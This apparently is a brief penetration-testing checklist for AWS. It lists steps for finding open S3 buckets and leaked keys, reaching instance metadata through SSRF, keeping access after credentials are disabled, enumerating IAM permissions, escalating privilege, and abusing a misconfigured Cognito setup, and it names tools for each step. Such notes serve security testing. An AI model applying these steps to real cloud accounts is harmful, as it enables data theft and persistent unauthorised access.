- Look for open S3 buckets, you might be able to exfiltrate a large amount of information and/or identify credentials.
- We are primarily looking for AWS Access Keys and Secret Keys (Regex online)
- We can sometimes access the AWS Metadata using an SSRF vulnerability
- Regular application vulnerabilities - SSRF, outdated software, etc.
- Scour GitHub to identify artifacts related to AWS accounts such as ARNs (Amazon Resource Names)
- Use the
get-session-tokencommand to ensure that if the permanent credentials are deleted/disabled, there will still be access to the environment. - Run the
list-user-policies,list-attached-user-policies, andlist groups for userscommands to see what permissions are attached. - Look at CloudTrail orgs to identify if there is anything interesting.
- In some instances you may observe that the user you have ran the 'AssumeRole' command to obtain another role (priv esc)
- If AWS Cognito is misconfigured and allows for the sign-up of a new user, an attacker can login and obtain a temporary AWS token for authenticated identities.
- After compromising a users account you can utilize a script such as enumerate-iam.py to brute-force permissions available to the account.
- We can also check for quick privilege escalation opportunities using RhinoSecurityLab's AWS Escalate.py script.
- We need to enumerate buckets that we have read access to - we can sync the information and enumerate the information locally.
- We can use the Security Token Service API to enumerate what user we are running under.